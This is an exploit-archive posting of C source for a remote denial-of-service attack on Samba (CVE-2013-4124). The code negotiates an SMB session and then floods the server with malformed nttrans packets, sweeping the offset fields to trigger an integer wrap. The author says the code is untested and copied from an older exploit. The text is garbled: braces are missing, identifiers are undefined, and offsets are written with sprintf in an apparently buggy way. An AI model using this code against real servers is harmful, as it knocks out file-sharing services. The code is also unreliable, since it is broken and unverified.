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Samba nttrans Denial Of Service

Samba nttrans Denial Of Service
Posted Aug 23, 2013
Authored by x90c

Samba malformed nttrans smb packet remote denial of service exploit. This is the second version of this exploit that adds an automated offset and second argument.

tags | exploit, remote, denial of service
advisories | CVE-2013-4124
SHA-256 | 9ffc449f91de8aebdf2d549084d0b7ded62399e2e6a995fffee9b45af3a36af1

Samba nttrans Denial Of Service

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!!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!

CVE-2013-4124 samba dos exploit

[x90c@ubuntu samba_dos]$ ./samba_nttrans_exploit
___ ___
/ _ \ / _ \
__ __| (_) || | | | ___
\ \/ / \__. || | | | / __|
> < / / | |_| || (__
/_/\_\ /_/ \___/ \___|

samba nttrans reply exploit

samba nttrans reply exploit Usage:

./samba_exploit [target ip addr] <server name>

ex) ./samba_exploit
ex) ./samba_exploit MYSAMBA

[x90c@ubuntu samba_dos]$

* ... Description ...:
I didn't test for the exploit yet, I
copied another samba nttrans exploit
in 2003 that http://www.securiteam.co
m/exploits/5TP0M2AAKS.html. 1) the vul
nerable data offset is automated from
0xffffffff to 0xf1000000 and can pass
second argument for server name to make
nbt session If pass target ip addr
and server name to this exploit the
samba will be dos!

the exploit send malformed nttrans
smb packet with large value of data
offset and param offset 2) they are all
of offset of nttrans struct to cause
integer wrap in the vulnerable function
of read_nttrns_ea_list

It should be works because 1) 2)

- exploit process:
(1) smb negotiations
(2) malformed smb nttrans packet within
offset 0xffffffff ~ 0xf1000000 to
integer wrap sent!
(3) ...... samba dos!

I left an article that analyzed it

!!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!



#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <ctype.h>
#include <signal.h>

typedef unsigned char uint8;
typedef unsigned short uint16;
typedef unsigned long uint32;

struct variable_data_header
{ uint8 wordcount, bytecount[2];

struct nbt_session_header
{ uint8 type, flags, len[2];

struct smb_base_header
{ uint8 protocol[4], command, errorclass, reserved, errorcode[2];
uint8 flags;
uint8 flags2[2], reserved2[12], tid[2], pid[2], uid[2], mid[2];

struct negprot_reply_header
{ uint8 wordcount;
uint8 dialectindex[2];
uint8 securitymode;
uint16 maxmpxcount, maxvccount;
uint32 maxbufsize, maxrawsize, sessionid, capabilities, timelow, timehigh;
uint16 timezone;
uint8 keylen;
uint16 bytecount;

struct sesssetupx_request_header
{ uint8 wordcount, command, reserved;
uint8 offset[2], maxbufsize[2], maxmpxcount[2], vcnumber[2];
uint8 sessionid[4];
uint8 ipasswdlen[2], passwdlen[2];
uint8 reserved2[4], capabilities[4];

struct sesssetupx_reply_header
{ uint8 wordcount, xcommand, xreserved, xoffset[2], action[2], bytecount[2];

struct tconx_request_header
{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];

struct tconx_reply_header
{ uint8 wordcount, xcommand, xreserved, xoffset[2], supportbits[2], bytecount[2];

struct nttrans_request_header
uint8 wordcount;
uint8 maxsetupcount;
uint8 flags[2];
uint8 totalparamcount[4];
uint8 totaldatacount[4];
uint8 maxparamcount[4];
uint8 maxdatacount[4];
uint8 paramcount[4];
uint8 paramoffset[4]; // offset!
uint8 datacount[4];
uint8 dataoffset[4]; // XXX the data offset vulnerable!
uint8 setupcount; // nttrans struct doesn't have other offset
uint8 function[2]; // field without them
uint8 bytecount[2];

#define SMB_NEGPROT 0x72
#define SMB_SESSSETUPX 0x73
#define SMB_TCONX 0x75
#define SMB_TRANS2 0x32
#define SMB_NTTRANS 0xA0
#define SMB_TRANS2OPEN 0x00
#define SMB_SESSIONREQ 0x81
#define SMB_SESSION 0x00

uint32 sessionid, PARAMBASE = 0x81c0000;
char *tconx_servername;
int tid, pid, uid;

#define STACKBOTTOM 0xbfffffff
#define STACKBASE 0xbfffd000

char *netbios_encode_name(char *name, int type)
{ char plainname[16], c, *encoded, *ptr;
int i, len = strlen(name);
if ((encoded = malloc(34)) == NULL)
{ fprintf(stderr, "malloc() failed\n");
ptr = encoded;
strncpy(plainname, name, 15);
*ptr++ = 0x20;
for (i = 0; i < 16; i++)
{ if (i == 15) c = type;
{ if (i < len) c = toupper(plainname[i]);
else c = 0x20;
*ptr++ = (((c >> 4) & 0xf) + 0x41);
*ptr++ = ((c & 0xf) + 0x41);
*ptr = '\0';
return encoded;

void construct_nbt_session_header(char *ptr, uint8 type, uint8 flags, uint32 len)
{ struct nbt_session_header *nbt_hdr = (struct nbt_session_header *)ptr;
uint16 nlen;

// geen idee of dit de juiste manier is, maar 't lijkt wel te werken ..
if (len > 65535) nlen = 65535;
else nlen = htons(len);

memset((void *)nbt_hdr, '\0', sizeof (struct nbt_session_header));

nbt_hdr->type = type;
nbt_hdr->flags = flags;
memcpy(&nbt_hdr->len, &nlen, sizeof (uint16));

// caller zorgt voor juiste waarde van ptr.
void construct_smb_base_header(char *ptr, uint8 command, uint8 flags, uint16 flags2, uint16 tid, uint16 pid,
uint16 uid, uint16 mid)
{ struct smb_base_header *base_hdr = (struct smb_base_header *)ptr;

memset(base_hdr, '\0', sizeof (struct smb_base_header));

memcpy(base_hdr->protocol, "\xffSMB", 4);

base_hdr->command = command;
base_hdr->flags = flags;

memcpy(&base_hdr->flags2, &flags2, sizeof (uint16));
memcpy(&base_hdr->tid, &tid, sizeof (uint16));
memcpy(&base_hdr->pid, &pid, sizeof (uint16));
memcpy(&base_hdr->uid, &uid, sizeof (uint16));
memcpy(base_hdr->mid, &mid, sizeof (uint16));

void construct_sesssetupx_header(char *ptr)
{ struct sesssetupx_request_header *sx_hdr = (struct sesssetupx_request_header *)ptr;
uint16 maxbufsize = 0xffff, maxmpxcount = 2, vcnumber = 31257, pwdlen = 0;
uint32 capabilities = 0x50;

memset(sx_hdr, '\0', sizeof (struct sesssetupx_request_header));

sx_hdr->wordcount = 13;
sx_hdr->command = 0xff;
memcpy(&sx_hdr->maxbufsize, &maxbufsize, sizeof (uint16));
memcpy(&sx_hdr->vcnumber, &vcnumber, sizeof (uint16));
memcpy(&sx_hdr->maxmpxcount, &maxmpxcount, sizeof (uint16));
memcpy(&sx_hdr->sessionid, &sessionid, sizeof (uint32));
memcpy(&sx_hdr->ipasswdlen, &pwdlen, sizeof (uint16));
memcpy(&sx_hdr->passwdlen, &pwdlen, sizeof (uint16));
memcpy(&sx_hdr->capabilities, &capabilities, sizeof (uint32));

struct tconx_request_header
{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];
-- uint16 bytecount geeft lengte van volgende fields aan: char password[], path[], service[];
}; */
void construct_tconx_header(char *ptr)
{ struct tconx_request_header *tx_hdr = (struct tconx_request_header *)ptr;
uint16 passwdlen = 1, bytecount;
char *data;

memset(tx_hdr, '\0', sizeof (struct tconx_request_header));

bytecount = strlen(tconx_servername) + 15;

if ((data = malloc(bytecount)) == NULL)
{ fprintf(stderr, "malloc() failed, aborting!\n");
memcpy(data, "\x00\x5c\x5c", 3);
memcpy(data + 3, tconx_servername, strlen(tconx_servername));
memcpy(data + 3 + strlen(tconx_servername), "\x5cIPC\x24\x00\x3f\x3f\x3f\x3f\x3f\x00", 12);

tx_hdr->wordcount = 4;
tx_hdr->xcommand = 0xff;

memcpy(&tx_hdr->passwdlen, &passwdlen, sizeof (uint16));
memcpy(&tx_hdr->bytecount, &bytecount, sizeof (uint16));

memcpy(ptr + sizeof (struct tconx_request_header), data, bytecount);

void nbt_session_request(int fd, char *clientname, char *servername)
char *cn, *sn;
char packet[sizeof (struct nbt_session_header) + (34 * 2)];

construct_nbt_session_header(packet, SMB_SESSIONREQ, 0, sizeof (packet) - sizeof (struct nbt_session_header));

tconx_servername = servername;

sn = netbios_encode_name(servername, 0x20);
cn = netbios_encode_name(clientname, 0x00);

memcpy(packet + sizeof (struct nbt_session_header), sn, 34);
memcpy(packet + (sizeof (struct nbt_session_header) + 34), cn, 34);

write(fd, packet, sizeof (packet));


void process_nbt_session_reply(int fd)
{ struct nbt_session_header nbt_hdr;
char *errormsg;
uint8 errorcode;
int size, len = 0;

if ((size = read(fd, &nbt_hdr, sizeof (nbt_hdr))) == -1)
{ close(fd);
fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno);
if (size != sizeof (nbt_hdr))
{ close(fd);
fprintf(stderr, "read() a broken packet, aborting.\n");
memcpy(&len, &nbt_hdr.len, sizeof (uint16));

if (len)
{ read(fd, (void *)&errorcode, 1);
switch (errorcode)
{ case 0x80 : errormsg = "Not listening on called name"; break;
case 0x81 : errormsg = "Not listening for calling name"; break;
case 0x82 : errormsg = "Called name not present"; break;
case 0x83 : errormsg = "Called name present, but insufficient resources"; break;
case 0x8f : errormsg = "Unspecified error"; break;
default : errormsg = "Unspecified error (unknown error code received!)"; break;
fprintf(stderr, "session request denied, reason: '%s' (code %i)\n", errormsg, errorcode);
printf("session request granted\n");

void negprot_request(int fd)
{ struct variable_data_header data;
char dialects[] = "\x2PC NETWORK PROGRAM 1.0\x0\x2MICROSOFT NETWORKS 1.03\x0\x2MICROSOFT NETWORKS 3.0\x0\x2LANMAN1.0\x0" \
"\x2LM1.2X002\x0\x2Samba\x0\x2NT LANMAN 1.0\x0\x2NT LM 0.12\x0\x2""FLATLINE'S KWAADWAAR";
char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data) + sizeof (dialects)];
int dlen = htons(sizeof (dialects));

memset(&data, '\0', sizeof (data));
construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));
pid = getpid();
construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NEGPROT, 8, 1, 0, pid, 0, 1);

memcpy(&data.bytecount, &dlen, sizeof (uint16));

memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)), &data, sizeof (data));
memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data)),
dialects, sizeof (dialects));

if (write(fd, packet, sizeof (packet)) == -1)
{ close(fd);
fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno);

void process_negprot_reply(int fd)
{ struct nbt_session_header *nbt_hdr;
struct smb_base_header *base_hdr;
struct negprot_reply_header *np_reply_hdr;
char packet[1024];
int size;
uint16 pid_reply;

nbt_hdr = (struct nbt_session_header *)packet;
base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));
np_reply_hdr = (struct negprot_reply_header *)(packet + (sizeof (struct nbt_session_header) +
sizeof (struct smb_base_header)));

if ((size = read(fd, packet, sizeof (packet))) == -1)
{ close(fd);
fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno);

memcpy(&pid_reply, &base_hdr->pid, sizeof (uint16));
memcpy(&sessionid, &np_reply_hdr->sessionid, sizeof (uint32));
if (base_hdr->command != SMB_NEGPROT || np_reply_hdr->wordcount != 17 || pid_reply != pid)
{ close(fd);
fprintf(stderr, "protocol negotiation failed\n");

printf("protocol negotiation complete\n");

void sesssetupx_request(int fd)
{ uint8 data[] = "\x12\x0\x0\x0\x55\x6e\x69\x78\x00\x53\x61\x6d\x62\x61";
char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +
sizeof (struct sesssetupx_request_header) + sizeof (data)];
int size;

construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));
construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_SESSSETUPX, 8, 1, 0, pid, 0, 1);
construct_sesssetupx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));
memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +
sizeof (struct sesssetupx_request_header), &data, sizeof (data));

if ((size = write(fd, packet, sizeof (packet))) == -1)
{ close(fd);
fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno);
if (size != sizeof (packet))
{ close(fd);
fprintf(stderr, "couldn't write entire packet, aborting!\n");

void process_sesssetupx_reply(int fd)
{ struct nbt_session_header *nbt_hdr;
struct smb_base_header *base_hdr;
struct sesssetupx_reply_header *sx_hdr;
char packet[1024];
int size, len;

if ((size = read(fd, packet, sizeof (packet))) == -1)
{ close(fd);
fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno);

nbt_hdr = (struct nbt_session_header *)packet;
base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));
sx_hdr = (struct sesssetupx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));

memcpy(&len, &nbt_hdr->len, sizeof (uint16));
memcpy(&uid, &base_hdr->uid, sizeof (uint16));

if (sx_hdr->xcommand != 0xff && sx_hdr->wordcount != 3)
{ close(fd);
fprintf(stderr, "session setup failed\n");

printf("session setup complete, got assigned uid %i\n", uid);

void tconx_request(int fd)
char *packet;
int size, pktsize = sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +
sizeof (struct tconx_request_header) + strlen(tconx_servername) + 15;

if ((packet = malloc(pktsize)) == NULL)
{ close(fd);
fprintf(stderr, "malloc() failed, aborting!\n");

construct_nbt_session_header(packet, SMB_SESSION, 0, pktsize - sizeof (struct nbt_session_header));
construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_TCONX, 8, 1, 0, pid, uid, 1);
construct_tconx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));

if ((size = write(fd, packet, pktsize)) == -1)
{ close(fd);
fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno);


if (size != pktsize)
{ close(fd);
fprintf(stderr, "couldn't write entire packet, aborting!\n");

void process_tconx_reply(int fd)
{ struct nbt_session_header *nbt_hdr;
struct smb_base_header *base_hdr;
struct tconx_reply_header *tx_hdr;
char packet[1024];
int size, bytecount;

if ((size = read(fd, packet, sizeof (packet))) == -1)
{ close(fd);
fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno);

nbt_hdr = (struct nbt_session_header *)packet;
base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));
tx_hdr = (struct tconx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));

memcpy(&tid, &base_hdr->tid, sizeof (uint16));
memcpy(&bytecount, &tx_hdr->bytecount, sizeof (uint16));

printf("tree connect complete, got assigned tid %i\n", tid);

void nttrans_request(int fd, unsigned int offset_wrap) {
// packet = nbt session header + smb base header + nttrans header!
char packet[sizeof (struct nbt_session_header) +
sizeof (struct smb_base_header) +
sizeof (struct nttrans_request_header)];
struct nttrans_request_header nttrans_hdr; // nttrans header!
int size=0;
int totalparamcount = TOTALCOUNT;
int totaldatacount = 0;
uint8 setupcount = 0;

memset(&nttrans_hdr, 0, sizeof nttrans_hdr);

// construct nbt session header
construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));
// construct smb base header
construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS, 8, 1, tid, pid, uid, 1);

// construct nttrans header
sprintf(nttrans_hdr.paramoffset, "%p", offset_wrap);

* XXX data offset 0xffffffff to 0xf1000000 to integer wrap
* the offset exploits the security bug of CVE-2013-4124
* samba remote dos!
sprintf(nttrans_hdr.dataoffset, "%p", offset_wrap);

nttrans_hdr.wordcount = 19 + setupcount;
memcpy(&nttrans_hdr.function, &function, sizeof (uint16));
memcpy(&nttrans_hdr.totalparamcount, &totalparamcount, sizeof (uint32));
memcpy(&nttrans_hdr.totaldatacount, &totaldatacount, sizeof (uint32));
memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nttrans_hdr, sizeof nttrans_hdr);

// send samba packet!
size = write(fd, packet, sizeof (packet));


static char banner[]={
" ___ ___ \n" \
" / _ \\ / _ \\ \n" \
" __ __| (_) || | | | ___ \n" \
" \\ \\/ / \\__. || | | | / __| \n" \
" > < / / | |_| || (__ \n" \
" /_/\\_\\ /_/ \\___/ \\___| \n" \

int main(int argc, char *argv[]) {
int fd;
struct sockaddr_in s_in;
char target_ip[16];
char server_name[32];
int smb_port=139;
unsigned int offset_wrap=0x00000000;

printf("%s\n\nsamba nttrans reply exploit\n\n", banner);

if(argc < 2){
fprintf(stderr, "samba nttrans reply exploit Usage:\n\n./samba_exploit [target ip addr] <server name>\n\n"
"ex) ./samba_exploit\n"
"ex) ./samba_exploit MYSAMBA\n\n");


strncpy(target_ip, argv[1], 16);

memset(server_name, 0, sizeof server_name);
strncpy(server_name, argv[2], sizeof(server_name)-1);
} else{
sprintf(server_name, "SAMBA");

printf("[*] SERVER NAME: %s\n", server_name);

memset(&s_in, 0, sizeof (s_in));
s_in.sin_family = AF_INET;
s_in.sin_port = htons(smb_port); // samba port=139/tcp
s_in.sin_addr.s_addr = inet_addr(target_ip);

connect(fd, (struct sockaddr *)&s_in, sizeof (s_in));

// nbt(netbios over tcpip, nbtstat) session request
nbt_session_request(fd, "BOSSA", server_name); // adjust computer names(clientname, servername)

// protocol negotiation

// session setup
sesssetupx_request(fd); // setup request
process_sesssetupx_reply(fd); // setup reply

// tree connection setup

// exploit!
printf("[*] nttrans reply exploit!\n");

// 0xffffffff ~ 0xf100000000 to integer wrap
for(offset_wrap=0xffffffff; offset_wrap >= 0xf1000000; --offset_wrap){
printf("[-] offset to wrap up: %p\n", offset_wrap);
nttrans_request(fd, offset_wrap);


return 0;
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